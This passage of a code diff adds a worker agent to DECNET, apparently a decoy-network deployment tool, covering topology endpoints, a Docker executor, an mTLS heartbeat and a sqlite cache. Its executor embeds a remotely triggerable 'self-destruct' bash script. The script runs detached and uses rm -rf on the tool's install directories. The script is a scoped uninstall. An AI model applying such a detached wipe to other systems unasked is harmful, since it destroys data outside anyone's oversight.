 class TeardownTopologyRequest(BaseModel):
    topology_id: str = Field(..., description="Topology UUID to dismantle")
@app.post(
    "/topology/apply",
    responses={
        400: {"description": "Malformed hydrated topology or hash mismatch"},
        409: {"description": "A different topology is already applied"},
        500: {"description": "Docker or compose raised while applying"},
    },
 )
 async def topology_apply(req: ApplyTopologyRequest) -> dict:
    store = _store()
    try:
        await _topology_ops.apply(req.hydrated, req.version_hash, store)
    except _topology_ops.HashMismatch as exc:
        raise HTTPException(status_code=400, detail=str(exc)) from exc
    except ValidationError as exc:
        raise HTTPException(status_code=400, detail=str(exc)) from exc
    except AlreadyApplied as exc:
        raise HTTPException(status_code=409, detail=str(exc)) from exc
    except Exception as exc:
        log.exception("agent.topology_apply failed")
        topology_id = (req.hydrated.get("topology") or {}).get("id")
        if topology_id:
            try:
                store.record_error(
                    str(topology_id), str(exc)[:500], hydrated=req.hydrated,
                )
            except Exception:  # noqa: BLE001 — don't mask original failure
                log.exception("failed to record apply error")
        raise HTTPException(status_code=500, detail=str(exc)) from exc
    _ensure_collector_started()
    return {"status": "applied", "version_hash": req.version_hash}
@app.post(
    "/topology/teardown",
    responses={500: {"description": "Docker or compose raised while tearing down"}},
 )
 async def topology_teardown(req: TeardownTopologyRequest) -> dict:
    try:
        await _topology_ops.teardown(req.topology_id, _store())
    except Exception as exc:
        log.exception("agent.topology_teardown failed")
        raise HTTPException(status_code=500, detail=str(exc)) from exc
    return {"status": "torn_down", "topology_id": req.topology_id}
@app.get("/topology/state")
 async def topology_state() -> dict:
    return _topology_ops.state(_store())
@app.post(
    "/mutate",
    status_code=202,
    responses={
        202: {"description": "Mutate accepted; runs in background; lifecycle delta pushed via heartbeat"},
        404: {"description": "No active deployment, or unknown decky_id (dry_run validation only)"},
    },
 )
 async def mutate(req: MutateRequest) -> Any:
    """Spawn the mutate in the background and return 202 immediately.
    Master tracks completion via a lifecycle delta pushed on the next
    heartbeat (immediate push on completion).  ``dry_run`` is still
    synchronous — it validates against the worker's current state and
    returns the would-be services without spawning a task or touching
    docker, so the wizard's preview path stays cheap."""
    if req.dry_run:
        from decnet.config import load_state
        state = load_state()
        if state is None:
            raise HTTPException(
                status_code=404,
                detail="no active deployment on this worker",
            )
        cfg, _ = state
        decky = next((d for d in cfg.deckies if d.name == req.decky_id), None)
        if decky is None:
            raise HTTPException(
                status_code=404,
                detail=f"decky {req.decky_id!r} not found in worker state",
            )
        return JSONResponse(
            status_code=200,
            content={
                "status": "dry_run",
                "decky_id": req.decky_id,
                "services": list(req.services),
            },
        )
    asyncio.create_task(
        _exec.mutate_async(req.decky_id, list(req.services)),
        name=f"mutate-{req.decky_id}",
    )
    return {
        "status": "accepted",
        "decky_id": req.decky_id,
        "services": list(req.services),
    }
--- a/decnet/agent/executor.py
+++ b/decnet/agent/executor.py
@@ -0,0 +1,317 @@
 # SPDX-License-Identifier: AGPL-3.0-or-later
 """Thin adapter between the agent's HTTP endpoints and the existing
 ``decnet.engine.deployer`` code path.
 Kept deliberately small: the agent does not re-implement deployment logic,
 it only translates a master RPC into the same function calls the unihost
 CLI already uses.  Everything runs in a worker thread (the deployer is
 blocking) so the FastAPI event loop stays responsive.
 """
 from __future__ import annotations
 import asyncio
 from ipaddress import IPv4Network
 from typing import Any
 from decnet.engine import deployer as _deployer
 from decnet.config import DecnetConfig, load_state, clear_state
 from decnet.logging import get_logger
 from decnet.network import (
    allocate_ips,
    detect_interface,
    detect_subnet,
    get_host_ip,
 )
 log = get_logger("agent.executor")
 def _relocalize(config: DecnetConfig) -> DecnetConfig:
    """Rewrite a master-built config to the worker's local network reality.
    The master populates ``interface``/``subnet``/``gateway`` from its own
    box before dispatching, which blows up the deployer on any worker whose
    NIC name differs (common in heterogeneous fleets — master on ``wlp6s0``,
    worker on ``enp0s3``). We always re-detect locally; if the worker sits
    on a different subnet than the master, decky IPs are re-allocated from
    the worker's subnet so they're actually reachable.
    """
    local_iface = detect_interface()
    local_subnet, local_gateway = detect_subnet(local_iface)
    local_host_ip = get_host_ip(local_iface)
    updates: dict[str, Any] = {
        "interface": local_iface,
        "subnet": local_subnet,
        "gateway": local_gateway,
    }
    master_net = IPv4Network(config.subnet, strict=False) if config.subnet else None
    local_net = IPv4Network(local_subnet, strict=False)
    if master_net is None or master_net != local_net:
        log.info(
            "agent.deploy subnet mismatch master=%s local=%s — re-allocating decky IPs",
            config.subnet, local_subnet,
        )
        fresh_ips = allocate_ips(
            subnet=local_subnet,
            gateway=local_gateway,
            host_ip=local_host_ip,
            count=len(config.deckies),
        )
        new_deckies = [d.model_copy(update={"ip": ip}) for d, ip in zip(config.deckies, fresh_ips)]
        updates["deckies"] = new_deckies
    return config.model_copy(update=updates)
 async def deploy(config: DecnetConfig, dry_run: bool = False, no_cache: bool = False) -> None:
    """Run the blocking deployer off-loop. The deployer itself calls
    save_state() internally once the compose file is materialised."""
    log.info(
        "agent.deploy mode=%s deckies=%d interface=%s (incoming)",
        config.mode, len(config.deckies), config.interface,
    )
    if config.mode == "swarm":
        config = _relocalize(config)
        log.info(
            "agent.deploy relocalized interface=%s subnet=%s gateway=%s",
            config.interface, config.subnet, config.gateway,
        )
    await asyncio.to_thread(_deployer.deploy, config, dry_run, no_cache, False)
 async def deploy_async(
    config: DecnetConfig, *, dry_run: bool = False, no_cache: bool = False,
 ) -> None:
    """Background-task body for /deploy: run the deploy, then push a
    lifecycle delta to the master so it observes terminal transitions
    immediately rather than waiting for the next scheduled heartbeat.
    Per-decky lifecycle deltas — master pivots them onto the matching
    open DeckyLifecycle rows via the heartbeat handler.  Errors are
    captured and pushed as ``failed`` deltas; the task itself never
    raises (a crashed task would just leave master rows wedged).
    """
    from datetime import datetime, timezone
    from decnet.agent.heartbeat import push_lifecycle_delta
    decky_names = [d.name for d in config.deckies]
    try:
        await deploy(config, dry_run=dry_run, no_cache=no_cache)
    except Exception as exc:  # noqa: BLE001
        log.exception("agent.deploy_async failed")
        err = f"{type(exc).__name__}: {exc}"
        deltas = [
            {
                "decky_name": name, "operation": "deploy",
                "status": "failed", "error": err[:2000],
                "completed_at": datetime.now(timezone.utc).isoformat(),
            }
            for name in decky_names
        ]
        await push_lifecycle_delta(deltas)
        return
    deltas = [
        {
            "decky_name": name, "operation": "deploy",
            "status": "succeeded",
            "completed_at": datetime.now(timezone.utc).isoformat(),
        }
        for name in decky_names
    ]
    await push_lifecycle_delta(deltas)
 async def mutate_async(decky_id: str, services: list[str]) -> None:
    """Background-task body for /mutate.  Same shape as deploy_async:
    perform the work, then push a single lifecycle delta on
    completion (success or failure)."""
    import time
    from datetime import datetime, timezone
    from decnet.composer import write_compose
    from decnet.config import load_state, save_state
    from decnet.engine import _compose_with_retry
    from decnet.agent.heartbeat import push_lifecycle_delta
    def _delta(status: str, error: str | None = None) -> dict:
        out = {
            "decky_name": decky_id, "operation": "mutate",
            "status": status,
            "completed_at": datetime.now(timezone.utc).isoformat(),
        }
        if error is not None:
            out["error"] = error[:2000]
        return out
    try:
        state = load_state()
        if state is None:
            await push_lifecycle_delta(
                [_delta("failed", "no active deployment on this worker")],
            )
            return
        cfg, compose_path = state
        decky = next((d for d in cfg.deckies if d.name == decky_id), None)
        if decky is None:
            await push_lifecycle_delta(
                [_delta("failed", f"decky {decky_id!r} not found in worker state")],
            )
            return
        decky.services = list(services)
        decky.last_mutated = time.time()
        save_state(cfg, compose_path)
        write_compose(cfg, compose_path)
        await asyncio.to_thread(
            _compose_with_retry, "up", "-d", "--remove-orphans",
            compose_file=compose_path,
        )
    except Exception as exc:  # noqa: BLE001
        log.exception("agent.mutate_async failed decky=%s", decky_id)
        err = f"{type(exc).__name__}: {exc}"
        await push_lifecycle_delta([_delta("failed", err)])
        return
    await push_lifecycle_delta([_delta("succeeded")])
 async def teardown(decky_id: str | None = None) -> None:
    log.info("agent.teardown decky_id=%s", decky_id)
    await asyncio.to_thread(_deployer.teardown, decky_id)
    if decky_id is None:
        await asyncio.to_thread(clear_state)
 def _decky_runtime_states(config: DecnetConfig) -> dict[str, dict[str, Any]]:
    """Map decky_name → {"running": bool, "services": {svc: container_state}}.
    Queried so the master can tell, after a partial-failure deploy, which
    deckies actually came up instead of tainting the whole shard as failed.
    Best-effort: a docker error returns an empty map, not an exception.
    """
    try:
        import docker  # local import — agent-only path
        client = docker.from_env()
        live = {c.name: c.status for c in client.containers.list(all=True, ignore_removed=True)}
    except Exception:  # pragma: no cover — defensive
        log.exception("_decky_runtime_states: docker query failed")
        return {}
    out: dict[str, dict[str, Any]] = {}
    for d in config.deckies:
        svc_states = {
            svc: live.get(f"{d.name}-{svc.replace('_', '-')}", "absent")
            for svc in d.services
        }
        out[d.name] = {
            "running": bool(svc_states) and all(s == "running" for s in svc_states.values()),
            "services": svc_states,
        }
    return out
 _REAPER_SCRIPT = r"""#!/bin/bash
 # DECNET agent self-destruct reaper.
 # Runs detached from the agent process so it survives the agent's death.
 # Waits briefly for the HTTP response to drain, then stops services,
 # wipes install paths, and preserves logs.
 set +e
 sleep 3
 # Stop decky containers started by the local deployer (best-effort).
 if command -v docker >/dev/null 2>&1; then
    docker ps -q --filter "label=com.docker.compose.project=decnet" | xargs -r docker stop
    docker ps -aq --filter "label=com.docker.compose.project=decnet" | xargs -r docker rm -f
    docker network rm decnet_lan 2>/dev/null
 fi
 # Stop+disable every systemd unit the installer may have dropped.
 for unit in decnet-agent decnet-engine decnet-collector decnet-forwarder decnet-prober decnet-reconciler decnet-sniffer decnet-updater; do
    systemctl stop "$unit" 2>/dev/null
    systemctl disable "$unit" 2>/dev/null
 done
 # Nuke install paths. Logs under /var/log/decnet* are intentionally
 # preserved — the operator typically wants them for forensic review.
 rm -rf /opt/decnet* /var/lib/decnet/* /usr/local/bin/decnet* /etc/decnet
 rm -f /etc/systemd/system/decnet-*.service /etc/systemd/system/decnet-*.timer
 systemctl daemon-reload 2>/dev/null
 rm -f "$0"
 """
 async def self_destruct() -> None:
    """Tear down deckies, then spawn a detached reaper that wipes the
    install footprint. Returns immediately so the HTTP response can drain
    before the reaper starts deleting files out from under the agent."""
    import os
    import shutil
    import subprocess  # nosec B404
    import tempfile
    # Best-effort teardown first — the reaper also runs docker stop, but
    # going through the deployer gives the host-macvlan/ipvlan helper a
    # chance to clean up routes cleanly.
    try:
        await asyncio.to_thread(_deployer.teardown, None)
        await asyncio.to_thread(clear_state)
    except Exception:
        log.exception("self_destruct: pre-reap teardown failed — reaper will force-stop containers")
    # Reaper lives under /tmp so it survives rm -rf /opt/decnet*.
    fd, path = tempfile.mkstemp(prefix="decnet-reaper-", suffix=".sh", dir="/tmp")  # nosec B108 — reaper must outlive /opt/decnet removal
    try:
        os.write(fd, _REAPER_SCRIPT.encode())
    finally:
        os.close(fd)
    os.chmod(path, 0o700)  # nosec B103 — root-owned reaper, needs exec
    # The reaper MUST run outside decnet-agent.service's cgroup — otherwise
    # `systemctl stop decnet-agent` SIGTERMs the whole cgroup (reaper included)
    # before rm -rf completes. `start_new_session=True` gets us a fresh POSIX
    # session but does NOT escape the systemd cgroup. So we prefer
    # `systemd-run --scope` (launches the command in a transient scope
    # detached from the caller's service), falling back to a bare Popen if
    # systemd-run is unavailable (non-systemd host / container).
    systemd_run = shutil.which("systemd-run")
    if systemd_run:
        argv = [
            systemd_run,
            "--collect",
            "--unit", f"decnet-reaper-{os.getpid()}",
            "--description", "DECNET agent self-destruct reaper",
            "/bin/bash", path,
        ]
        spawn_kwargs = {"start_new_session": True}
    else:
        argv = ["/bin/bash", path]
        spawn_kwargs = {"start_new_session": True}
    subprocess.Popen(  # type: ignore[call-overload]  # nosec B603
        argv,
        stdin=subprocess.DEVNULL,
        stdout=subprocess.DEVNULL,
        stderr=subprocess.DEVNULL,
        close_fds=True,
        **spawn_kwargs,
    )
    log.warning(
        "self_destruct: reaper spawned path=%s via=%s — agent will die in ~3s",
        path, "systemd-run" if systemd_run else "popen",
    )
 async def status() -> dict[str, Any]:
    state = await asyncio.to_thread(load_state)
    if state is None:
        return {"deployed": False, "deckies": []}
    config, _compose_path = state
    runtime = await asyncio.to_thread(_decky_runtime_states, config)
    return {
        "deployed": True,
        "mode": config.mode,
        "compose_path": str(_compose_path),
        "deckies": [d.model_dump() for d in config.deckies],
        "runtime": runtime,
    }
--- a/decnet/agent/heartbeat.py
+++ b/decnet/agent/heartbeat.py
@@ -0,0 +1,210 @@
 # SPDX-License-Identifier: AGPL-3.0-or-later
 """Agent → master liveness heartbeat loop.
 Every ``INTERVAL_S`` seconds the worker posts ``executor.status()`` to
 ``POST <master>/swarm/heartbeat`` over mTLS. The master pins the
 presented client cert's SHA-256 against the ``SwarmHost`` row for the
 claimed ``host_uuid``; a match refreshes ``last_heartbeat`` + each
 ``DeckyShard``'s snapshot + runtime state.
 Identity comes from ``/etc/decnet/decnet.ini`` (seeded by the enroll
 bundle) — specifically ``DECNET_HOST_UUID`` and ``DECNET_MASTER_HOST``.
 The worker's existing ``~/.decnet/agent/`` bundle (or
 ``/etc/decnet/agent/``) provides the mTLS client cert.
 Started/stopped via the agent FastAPI app's lifespan. If identity
 plumbing is missing (pre-enrollment dev runs) the loop logs at DEBUG and
 declines to start — callers don't have to guard it.
 """
 from __future__ import annotations
 import asyncio
 import pathlib
 from typing import Optional
 import httpx
 from decnet.agent import executor as _exec
 from decnet.logging import get_logger
 from decnet.swarm import pki
 from decnet.swarm.log_forwarder import build_worker_ssl_context
 log = get_logger("agent.heartbeat")
 INTERVAL_S = 30.0
 _TIMEOUT = httpx.Timeout(connect=5.0, read=10.0, write=5.0, pool=5.0)
 _task: Optional[asyncio.Task] = None
 def _resolve_agent_dir() -> pathlib.Path:
    """Match the agent-dir resolution order used by the agent server:
    DECNET_AGENT_DIR env, else /etc/decnet/agent (production install),
    else ~/.decnet/agent (dev)."""
    import os
    env = os.environ.get("DECNET_AGENT_DIR")
    if env:
        return pathlib.Path(env)
    system = pathlib.Path("/etc/decnet/agent")
    if system.exists():
        return system
    return pki.DEFAULT_AGENT_DIR
 async def _build_body(
    host_uuid: str,
    agent_version: str,
    lifecycle: Optional[list[dict]] = None,
 ) -> dict:
    snap = await _exec.status()
    body: dict = {
        "host_uuid": host_uuid,
        "agent_version": agent_version,
        "status": snap,
    }
    # Best-effort: fold in applied-topology snapshot. Failures must never
    # wedge the heartbeat loop — master will fall back to "no topology
    # reported" which triggers a resync if it expected one.
    try:
        from decnet.agent import topology_ops as _topo_ops
        from decnet.agent.topology_store import TopologyStore
        store = TopologyStore(_resolve_agent_dir() / "topology.db")
        try:
            body["topology"] = _topo_ops.state(store)
        finally:
            store.close()
    except Exception:
        log.debug("heartbeat: topology state unavailable", exc_info=True)
    if lifecycle:
        body["lifecycle"] = lifecycle
    return body
 async def _tick(client: httpx.AsyncClient, url: str, host_uuid: str, agent_version: str) -> None:
    body = await _build_body(host_uuid, agent_version)
    resp = await client.post(url, json=body)
    # 403 / 404 are terminal-ish — we still keep looping because an
    # operator may re-enrol the host mid-session, but we log loudly so
    # prod ops can spot cert-pinning drift.
    if resp.status_code == 204:
        return
    log.warning(
        "heartbeat rejected status=%d body=%s",
        resp.status_code, resp.text[:200],
    )
 async def _loop(url: str, host_uuid: str, agent_version: str, ssl_ctx) -> None:
    log.info("heartbeat loop starting url=%s host_uuid=%s interval=%ss",
             url, host_uuid, INTERVAL_S)
    async with httpx.AsyncClient(verify=ssl_ctx, timeout=_TIMEOUT) as client:
        while True:
            try:
                await _tick(client, url, host_uuid, agent_version)
            except asyncio.CancelledError:
                raise
            except Exception:
                log.exception("heartbeat tick failed — will retry in %ss", INTERVAL_S)
            await asyncio.sleep(INTERVAL_S)
 def start() -> Optional[asyncio.Task]:
    """Kick off the background heartbeat task. No-op if identity is
    unconfigured (dev mode) — the caller doesn't need to check."""
    global _task
    from decnet.env import (
        DECNET_HOST_UUID,
        DECNET_MASTER_HOST,
        DECNET_SWARMCTL_PORT,
    )
    if _task is not None and not _task.done():
        return _task
    if not DECNET_HOST_UUID or not DECNET_MASTER_HOST:
        log.debug("heartbeat not starting — DECNET_HOST_UUID or DECNET_MASTER_HOST unset")
        return None
    agent_dir = _resolve_agent_dir()
    try:
        ssl_ctx = build_worker_ssl_context(agent_dir)
    except Exception:
        log.exception("heartbeat not starting — worker SSL context unavailable at %s", agent_dir)
        return None
    try:
        from decnet import __version__ as _v  # type: ignore[attr-defined]
        agent_version = _v
    except Exception:
        agent_version = "unknown"
    url = f"https://{DECNET_MASTER_HOST}:{DECNET_SWARMCTL_PORT}/swarm/heartbeat"
    _task = asyncio.create_task(
        _loop(url, DECNET_HOST_UUID, agent_version, ssl_ctx),
        name="agent-heartbeat",
    )
    return _task
 async def push_lifecycle_delta(deltas: list[dict]) -> None:
    """Fire a one-off heartbeat POST carrying *deltas* in the
    ``lifecycle`` field.  Each delta: ``{decky_name, operation, status,
    error?, completed_at?}``.
    Called by the agent executor on /deploy and /mutate completion so
    the master observes the terminal transition immediately rather than
    waiting up to ``INTERVAL_S`` for the next scheduled tick.  Failures
    are logged and swallowed; the next scheduled heartbeat carries the
    same deltas via DB-side reconciliation, since the worker has no
    durable per-row state to lose.
    """
    from decnet.env import (
        DECNET_HOST_UUID,
        DECNET_MASTER_HOST,
        DECNET_SWARMCTL_PORT,
    )
    if not deltas:
        return
    if not DECNET_HOST_UUID or not DECNET_MASTER_HOST:
        log.debug("push_lifecycle_delta: identity unconfigured — skipping")
        return
    agent_dir = _resolve_agent_dir()
    try:
        ssl_ctx = build_worker_ssl_context(agent_dir)
    except Exception:
        log.exception("push_lifecycle_delta: SSL context unavailable")
        return
    try:
        from decnet import __version__ as _v  # type: ignore[attr-defined]
        agent_version = _v
    except Exception:
        agent_version = "unknown"
    url = f"https://{DECNET_MASTER_HOST}:{DECNET_SWARMCTL_PORT}/swarm/heartbeat"
    try:
        async with httpx.AsyncClient(verify=ssl_ctx, timeout=_TIMEOUT) as client:
            body = await _build_body(
                DECNET_HOST_UUID, agent_version, lifecycle=deltas,
            )
            resp = await client.post(url, json=body)
            if resp.status_code not in (200, 204):
                log.warning(
                    "lifecycle delta push rejected status=%d body=%s",
                    resp.status_code, resp.text[:200],
                )
    except Exception:
        log.exception("push_lifecycle_delta failed — next scheduled tick will retry")
 async def stop() -> None:
    global _task
    if _task is None:
        return
    _task.cancel()
    try:
        await _task
    except (asyncio.CancelledError, Exception):
        pass
    _task = None
--- a/decnet/agent/server.py
+++ b/decnet/agent/server.py
@@ -0,0 +1,71 @@
 # SPDX-License-Identifier: AGPL-3.0-or-later
 """Worker-agent uvicorn launcher.
 Starts ``decnet.agent.app:app`` over HTTPS with mTLS enforcement.  The
 worker must already have a bundle in ``~/.decnet/agent/`` (delivered by
 ``decnet swarm enroll`` from the master); if it does not, we refuse to
 start — unauthenticated agents are not a supported mode.
 """
 from __future__ import annotations
 import os
 import pathlib
 import signal
 import subprocess  # nosec B404
 import sys
 from decnet.logging import get_logger
 from decnet.swarm import pki
 log = get_logger("agent.server")
 def run(host: str, port: int, agent_dir: pathlib.Path = pki.DEFAULT_AGENT_DIR) -> int:
    bundle = pki.load_worker_bundle(agent_dir)
    if bundle is None:
        print(
            f"[agent] No cert bundle at {agent_dir}. "
            f"Run `decnet swarm enroll` from the master first.",
            file=sys.stderr,
        )
        return 2
    keyfile = agent_dir / "worker.key"
    certfile = agent_dir / "worker.crt"
    cafile = agent_dir / "ca.crt"
    cmd = [
        sys.executable,
        "-m",
        "uvicorn",
        "decnet.agent.app:app",
        "--host",
        host,
        "--port",
        str(port),
        "--ssl-keyfile",
        str(keyfile),
        "--ssl-certfile",
        str(certfile),
        "--ssl-ca-certs",
        str(cafile),
        # 2 == ssl.CERT_REQUIRED — clients MUST present a CA-signed cert.
        "--ssl-cert-reqs",
        "2",
    ]
    log.info("agent starting host=%s port=%d bundle=%s", host, port, agent_dir)
    # Own process group for clean Ctrl+C / SIGTERM propagation to uvicorn
    # workers (same pattern as `decnet api`).
    proc = subprocess.Popen(cmd, start_new_session=True)  # nosec B603
    try:
        return proc.wait()
    except KeyboardInterrupt:
        try:
            os.killpg(proc.pid, signal.SIGTERM)
            try:
                return proc.wait(timeout=10)
            except subprocess.TimeoutExpired:
                os.killpg(proc.pid, signal.SIGKILL)
                return proc.wait()
        except ProcessLookupError:
            return 0
--- a/decnet/agent/topology_ops.py
+++ b/decnet/agent/topology_ops.py
@@ -0,0 +1,220 @@
 # SPDX-License-Identifier: AGPL-3.0-or-later
 """Agent-side topology apply/teardown/state primitives.
 Wraps the compose + bridge machinery from :mod:`decnet.engine.deployer`
 so the agent can drive a topology without ever touching the master's
 sqlmodel repo.  The master-side ``deploy_topology`` always calls
 ``transition_status(repo, …)`` which is useless (and unreachable) on
 an agent — here we operate purely on a hydrated dict + the local
 :class:`TopologyStore`.
 v1 constraint: one topology per agent.  A second apply for a different
 ``topology_id`` triggers an on-the-spot teardown of the predecessor
 before the new apply proceeds — master is authoritative.
 """
 from __future__ import annotations
 import asyncio
 import subprocess  # nosec B404
 from typing import Any
 import docker
 from decnet.agent.topology_store import (
    TopologyStore,
    observed,
 )
 from decnet.engine.deployer import (
    _compose,
    _compose_with_retry,
    _teardown_order,
    _topology_compose_path,
    _topology_compose_project,
 )
 from decnet.logging import get_logger
 from decnet.network import create_bridge_network, remove_bridge_network
 from decnet.topology.compose import (
    _network_name as _topology_network_name,
    write_topology_compose,
 )
 from decnet.topology.hashing import canonical_hash
 from decnet.topology.validate import (
    ValidationError,
    errors as _validation_errors,
    validate as _validate_topology,
 )
 log = get_logger("agent.topology_ops")
 class HashMismatch(RuntimeError):
    """Raised when the master-provided version_hash doesn't match what we
    hash locally — suggests serialisation drift.  We fail loudly rather
    than silently papering over a schema mismatch."""
 def _topology_id(hydrated: dict[str, Any]) -> str:
    topo = hydrated.get("topology") or {}
    tid = topo.get("id")
    if not tid:
        raise ValueError("hydrated topology missing topology.id")
    return str(tid)
 def _check_hash_and_validate(hydrated: dict[str, Any], version_hash: str) -> str:
    """Verify hash integrity and structural validity; return topology_id."""
    local_hash = canonical_hash(hydrated)
    if local_hash != version_hash:
        raise HashMismatch(
            f"master hash {version_hash!r} does not match agent hash "
            f"{local_hash!r} — refusing to apply"
        )
    issues = _validate_topology(hydrated)
    if _validation_errors(issues):
        raise ValidationError(issues)
    return _topology_id(hydrated)
 async def _teardown_superseded(topology_id: str, store: TopologyStore) -> None:
    """Tear down the current topology if it differs from topology_id.
    Master is authoritative — a different pinned topology (fully applied,
    partially applied, or drifted) is torn down before the new apply proceeds.
    Refusing with 409 would leave the agent stuck in a state only a human
    could resolve.
    """
    existing = store.current()
    if existing is None or existing.topology_id == topology_id:
        return
    log.info(
        "superseding topology %s with %s on master authority",
        existing.topology_id, topology_id,
    )
    try:
        await teardown(existing.topology_id, store)
    except Exception as exc:  # noqa: BLE001 — we still want to try applying
        log.warning(
            "best-effort teardown of superseded topology %s failed: %s",
            existing.topology_id, exc,
        )
        # Hard-clear the store row so the new apply isn't blocked by a
        # half-torn-down predecessor.  Leftover docker objects surface via
        # the next heartbeat's observed block.
        store.clear(existing.topology_id)
 def _materialise(hydrated: dict[str, Any], topology_id: str) -> None:
    """Create bridge networks, write compose file, and bring up containers.
    Sync/blocking — callers must dispatch via asyncio.to_thread.
    ``--always-recreate-deps`` keeps service containers' netns shares
    fresh: every decky service joins its base's netns via
    ``network_mode: container:<base>``, and that share is bound at
    service start time. If a base is recreated (e.g. when ``ports:``
    changes after toggling ``forwards_l3``) but compose decides the
    services are unchanged, the services keep a stale netns FD
    pointing at the destroyed base — they end up in an empty
    namespace with only ``lo``, and external traffic hits a closed
    port on the live base. Forcing dependents to recreate alongside
    the base is the cheapest way to make this race impossible.
    """
    compose_path = _topology_compose_path(topology_id)
    compose_project = _topology_compose_project(topology_id)
    client = docker.from_env()
    for lan in hydrated["lans"]:
        net_name = _topology_network_name(topology_id, lan["name"])
        create_bridge_network(client, net_name, lan["subnet"], internal=not lan["is_dmz"])
    write_topology_compose(hydrated, compose_path)
    _compose_with_retry(
        "up", "--build", "-d", "--always-recreate-deps",
        compose_file=compose_path, project=compose_project,
    )
 async def apply(
    hydrated: dict[str, Any],
    version_hash: str,
    store: TopologyStore,
 ) -> None:
    """Materialise *hydrated* on this agent and record it in *store*.
    Raises:
      HashMismatch: master and agent disagree on the canonical hash —
        don't touch docker, fail the apply.
      ValidationError: topology fails structural validation.
      Any docker / compose error propagates up; the endpoint maps it
        to 500 and records the message on the store row.
    """
    topology_id = _check_hash_and_validate(hydrated, version_hash)
    await _teardown_superseded(topology_id, store)
    await asyncio.to_thread(_materialise, hydrated, topology_id)
    store.put(topology_id, version_hash, hydrated)
    log.info("topology %s applied on agent (%d LANs)", topology_id, len(hydrated["lans"]))
 async def teardown(
    topology_id: str,
    store: TopologyStore,
 ) -> None:
    """Tear down *topology_id* on this agent.  Idempotent: if there's no
    record and no compose file, it's a no-op that still returns cleanly."""
    row = store.current()
    # Prefer the stored hydrated blob — it's what we applied with.  If
    # it's gone (db wiped) but compose-file lingers, we still try to
    # compose-down and delete bridges by scanning the compose file's
    # LAN membership list via the hydrated blob if available.
    hydrated = row.hydrated if row and row.topology_id == topology_id else None
    compose_path = _topology_compose_path(topology_id)
    compose_project = _topology_compose_project(topology_id)
    client = docker.from_env()
    def _dismantle() -> None:
        if compose_path.exists():
            try:
                _compose(
                    "down", "--remove-orphans",
                    compose_file=compose_path, project=compose_project,
                )
            except subprocess.CalledProcessError as exc:
                log.warning(
                    "topology %s compose down failed (continuing): %s",
                    topology_id, exc,
                )
        if hydrated is not None:
            for lan_name in _teardown_order(hydrated["lans"]):
                net_name = _topology_network_name(topology_id, lan_name)
                remove_bridge_network(client, net_name)
        if compose_path.exists():
            compose_path.unlink()
    await asyncio.to_thread(_dismantle)
    store.clear(topology_id)
    log.info("topology %s torn down on agent", topology_id)
 def state(store: TopologyStore) -> dict[str, Any]:
    """Snapshot-plus-live-observation — the shape the heartbeat embeds."""
    row = store.current()
    try:
        obs = observed(docker.from_env())
    except Exception as exc:  # noqa: BLE001 — docker socket may be gone
        obs = {"error": str(exc)[:200]}
    if row is None:
        return {
            "topology_id": None,
            "applied_version_hash": None,
            "applied_at": None,
            "last_error": None,
            "observed": obs,
        }
    return {
        "topology_id": row.topology_id,
        "applied_version_hash": row.applied_version_hash,
        "applied_at": row.applied_at,
        "last_error": row.last_error,
        "observed": obs,
    }
 __all__ = ["apply", "teardown", "state", "HashMismatch"]
--- a/decnet/agent/topology_store.py
+++ b/decnet/agent/topology_store.py
@@ -0,0 +1,215 @@
 # SPDX-License-Identifier: AGPL-3.0-or-later
 """Agent-side sqlite cache of the currently-applied topology.
 **This is a cache, not a source of truth.**  The master is the only
 authority for what the agent should be running.  This store exists so
 the agent can answer two questions quickly and offline:
 1. What topology did I last apply, and with what version hash?
 2. Is what docker is currently doing consistent with that?
 The hash goes out on every heartbeat; the master compares it to what
 it thinks this host should be running and schedules a re-push on
 mismatch.
 Why sqlite when the blob is JSON?  Consistent with
 :mod:`decnet.swarm.log_forwarder._OffsetStore` — single-row sqlite is
 the project-wide pattern for agent-local persistent state.  Keeps
 operational mental model small: "one state.db per thing".
 Design choices worth calling out:
 - **One row, one topology.**  v1 only supports a single topology per
  agent.  Attempting to :meth:`put` a different ``topology_id`` while
  a row already exists raises :class:`AlreadyApplied` — the agent
  rejects the apply with 409 and the master is expected to teardown
  the old one first.
 - **No auto-restore on boot.**  The agent does NOT read this db at
  startup and try to re-apply.  Whatever docker has after a restart
  is what it has; the next heartbeat reports the truth and the
  master decides whether to re-push.  Same reason we don't sync
  mutations from agent → master anywhere else: split-brain is worse
  than temporary drift.
 """
 from __future__ import annotations
 import json
 import pathlib
 import sqlite3
 import time
 from dataclasses import dataclass
 from typing import Any, Optional
 class AlreadyApplied(RuntimeError):
    """Raised when a different topology is already pinned to this agent."""
@dataclass(frozen=True)
 class AppliedRow:
    topology_id: str
    applied_version_hash: str
    hydrated: dict[str, Any]
    applied_at: int
    last_error: Optional[str]
 class TopologyStore:
    """Single-row sqlite cache. Stdlib only, sync (called from endpoints)."""
    def __init__(self, db_path: pathlib.Path) -> None:
        db_path.parent.mkdir(parents=True, exist_ok=True)
        # check_same_thread=False: Starlette/FastAPI runs sync endpoint
        # bodies on a worker thread distinct from where `app` is imported.
        # The agent is single-process, so there's no real contention —
        # sqlite's own connection lock is enough.
        self._conn = sqlite3.connect(str(db_path), check_same_thread=False)
        self._conn.row_factory = sqlite3.Row
        self._conn.execute(
            "CREATE TABLE IF NOT EXISTS applied_topology ("
            " topology_id TEXT PRIMARY KEY,"
            " applied_version_hash TEXT NOT NULL,"
            " hydrated_blob_json TEXT NOT NULL,"
            " applied_at INTEGER NOT NULL,"
            " last_error TEXT)"
        )
        self._conn.commit()
    # ----------------------------------------------------------------- reads
    def current(self) -> Optional[AppliedRow]:
        """Return the single applied topology, or ``None`` if idle."""
        row = self._conn.execute(
            "SELECT topology_id, applied_version_hash, hydrated_blob_json,"
            " applied_at, last_error FROM applied_topology LIMIT 1"
        ).fetchone()
        if row is None:
            return None
        return AppliedRow(
            topology_id=row["topology_id"],
            applied_version_hash=row["applied_version_hash"],
            hydrated=json.loads(row["hydrated_blob_json"]),
            applied_at=int(row["applied_at"]),
            last_error=row["last_error"],
        )
    # ---------------------------------------------------------------- writes
    def put(
        self,
        topology_id: str,
        applied_version_hash: str,
        hydrated: dict[str, Any],
    ) -> None:
        """Record an applied topology.
        If a *different* topology is already recorded, raises
        :class:`AlreadyApplied`.  Re-applying the same ``topology_id``
        just updates the hash + blob (idempotent re-push).
        """
        existing = self.current()
        if existing is not None and existing.topology_id != topology_id:
            raise AlreadyApplied(
                f"agent already has topology {existing.topology_id!r}; "
                f"cannot apply {topology_id!r}"
            )
